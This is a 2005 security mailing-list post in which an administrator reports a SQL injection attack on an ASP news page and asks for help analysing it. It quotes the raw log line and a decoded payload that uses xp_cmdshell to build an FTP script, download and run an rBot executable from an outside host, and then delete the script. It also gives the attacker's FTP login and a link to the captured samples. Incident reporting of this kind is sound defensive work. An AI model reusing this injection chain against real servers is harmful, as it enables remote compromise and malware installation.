Incidents
SQL injection worm ? Jan 05 2005 05:22PM
Maxime Ducharme (mducharme cybergeneration com)

Hi list,
we receveid a particular SQL injection attack
on one of our site.

Attack looks like :
2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET
/Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%7
3%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%
65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%
20op
en%20217.199.183.122%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacro
med%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64
%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot
%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%
52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemro
ot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%2
5%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52
..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%
25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%5
2..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25syste
mroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%5
4%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csyste
m32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%
5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%
5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server
]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1
attacked.web.site.com - - -

HTTP request contains only 2 fields (beside HTTP method) :
Connection: Keep-Alive
Host: attacked.web.site.com

(I obviously replaced the name of the site).

Decoded SQL injection looks like :
exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >>
%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe
%systemroot%\system32\Macromed\lolx\arcdlrde.exe >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >>
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell
'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe

y.y.y.y is a foreign IP in Europe which host FTP an WWW server.
I sent a notice this this site sysadmin about the situation.

I have been able to connect to this FTP with the account hahajk/hahaowned
(which do not seem legit to me ...) and download suspicious files.
I mirrored them here :
http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have also been advised.

I know rbot.exe is known to be Randex worm, but i'd like that have
some other results / analysis.

I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this hosts's activity on every server
and every firewall we run, and I only see 1 TCP connection which
is the prepared SQL injections attack, nothing else.

Anybody see similar activity ?

I'm asking since I want to know if we are targeted by someone of
by a worm like Santy of use search engines to find vulnerable
ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus